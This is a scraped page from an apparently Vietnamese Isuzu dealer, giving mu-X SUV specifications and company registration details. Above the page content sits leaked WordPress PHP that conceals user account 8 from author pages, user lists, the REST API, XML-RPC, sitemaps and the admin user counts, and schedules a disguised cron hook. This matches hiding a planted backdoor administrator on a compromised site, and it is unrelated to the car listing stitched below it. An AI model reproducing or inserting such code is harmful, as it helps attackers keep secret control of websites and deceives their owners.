add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 8;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 8 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 8;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 8;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 8;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 8;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Isuzu Cẩm Phong - Đại lý Isuzu Sóc Trăng
SUV ISUZU - MU-X - SPORT 1.9L 4x4 AT | ISUZU CẨM PHONG - SÓC TRĂNG
515 QL1A, Phụng Hiệp, An Ninh, TP Cần Thơ
|
homepage
SUV ISUZU - MU-X - SPORT 1.9L 4x4 AT
Exterior
BOLD & DYNAMIC
The MU-X is an impressive multi-purpose vehicle displaying a bold and dynamic style. Aerodynamic design not only enhances the look but ensures smooth and efficient performance.
Interior
BOLD & REFINED
The ISUZU mu-X consistently attracts all attention and evokes a modern, comfortable lifestyle. The cabin provides spaciousness and comfort for passengers, while the rear seats can be folded flat to optimize luggage space. The second and third-row seats also feature appropriate recline angles, ensuring passengers are more comfortable on long journeys.
Safety
SAFETY UNCOMPROMISED
In addition to its advanced active safety technologies, the ISUZU mu-X comes fully equipped with all other necessary safety systems, providing ultimate safety on every journey. Wherever you travel, the ISUZU mu-X stands by you, protecting you with top-tier safety features.
explore Specification
OVERVIEW
DIMENSION & WEIGHT
ENGINE
TRANSMISSION
CHASSIS
EXTERIOR
INTERIOR
CONVENIENCE
SAFETY
Manufacturers Name
Isuzu Motors Co., (Thailand) LTD
Manufacturers Address
38 Kor. Moo 9, Poochaosamingprai rd., Samrong Tai, Phrapradaeng, Samutprakarn 10130, Thailand
Origin
Thailand
Certification number of approval (TA)
21KOT/274470
Model code
UCR87GGL-TLUHVN
Emission
Euro 5
Overall dimension (L x W x H)
mm
4,860 x 1,870 x 1,875
Wheelbase
mm
2,855
Ground clearance
mm
235
Gross vehicle weight
kg
2,800
Kerbs weight
kg
2,060
Min. turning radius
m
5.7
Fuel tank capacity
Liter
80
Seating capacity
Persons
07
Model
RZ4E-TC
Type
Diesel 1.9L, In-line 4 cylinders, Intercooler VGS turbo, Common rail
Displacement
cc
1,898
Max. output
PS (KW)/rpm
150 (110)/3,600
Max. torque
Nm/rpm
350/1,800-2,600
Emission standard
EURO 5
Drive configuration
RWD
Fuel Consumption
Urban
8.68 Liter / 100 km
Rural
4.47 Liter / 100 km
Combine
6.15 Liter / 100 km
Type
6-speed AT
Free wheel hubs
Shift-on the fly
Suspension
Front
Independent, double wishbone with coil spring
Rear
5-link suspension, coil spring
Brake system
Front
Ventilated disc
Rear
Ventilated disc
Assisted steering type
Hydraulic
Wheel
18 inch Aluminum Alloy
Tire
265/60R18
Head lamp
Bi-LED Projector, automatic leveling, with LED DRL
Fog lamp
LED
Follow Me Home
With
Side mirror
Power folding, power adjust, side turn lamp
Auto windshield wiper
–
Power tailgate
–
Steering wheel
Type
Leather + decoration, switches
Paddle shift
–
Adjustment
Tilt & Telescopic
Seat
1st row
Power 8-ways driver seat
2nd row
60:40 ratio split, folding, central arm rest
3rd row
50:50 ratio split, folding type
Material
Leather (Truffle Brown)
Power windows
Auto up & down with jam protection for driver side
Smart key & Push start
With
Smart entry
With
Remote start engine
–
Walk away auto door lock
With
Auto cruise control
With
Electric Parking Brake
With (Auto hold)
Air conditioner
Auto Dual Zone
Rear ventilation
With
Entertainment system
9 inch touch screen, Wireless Apple CarPlay & Android Auto
No. of speakers
06
USB port for charge electric device (5V/2.1A)
4
Power outlet (220V, 150W)
With
Airbag
06
ABS (Anti-lock Brake System)
With
EBD (Electronic Brakeforce Distribution)
With
BA (Brake Assist)
With
ESC (Electronic Stability Control)
With
TCS (Traction Control System)
With
HSA (Hill Start Assist)
With
HDC (Hill Descent Control)
With
BOS (Brake Override System)
With
AHB (Automatic High Beam)
–
TPMS (Tire Pressure Monitor System)
–
MCB (Multi Collision Brake)
–
RCTA (Rear Cross Traffic Alert)
–
BSM (Blind Spot Monitor)
–
MSL (Manual Speed Limiter)
–
LDW (Lane Departure Warning)
–
FCW (Forward Collision Warning)
–
AEB (Autonomous Emergency Brake)
–
MAM (Pedal Misapplication Mitigation)
–
Rear View Camera
With
Parking aid
Front & Rear
Seat belt
03 x ELR with pretensioner & Load limiter
03 x ELR
03 x ELR
Auto door lock
With
Door lock release when airbag deploy
With
Child-proof door lock
With
Số GCNDKDN: 2200722006 - Cấp lần đầu ngày: 12/07/2016
Đăng ký bổ sung lần 2 ngày: 22/05/2025
Cơ quan cấp: Phòng ĐKKD Sở Kế Hoạch & Đầu Tư Tỉnh Sóc Trăng
Địa chỉ: 21 Trần Hưng Đạo, Phường 3, Sóc Trăng
Đại lý isuzu Cẩm Phong. All rights reserved. © Copyright 2022
Số GCN Cơ sở bảo hành bảo dưỡng: 117/VAQ12-01/19-00
Giấy chứng nhận cấp ngày: 13/08/2019
Cơ quan cấp: Cục đăng kiểm Việt Nam
Địa chỉ cơ sở: 515 QL1A, Phụng Hiệp, An Hiệp, Châu Thành, Sóc Trăng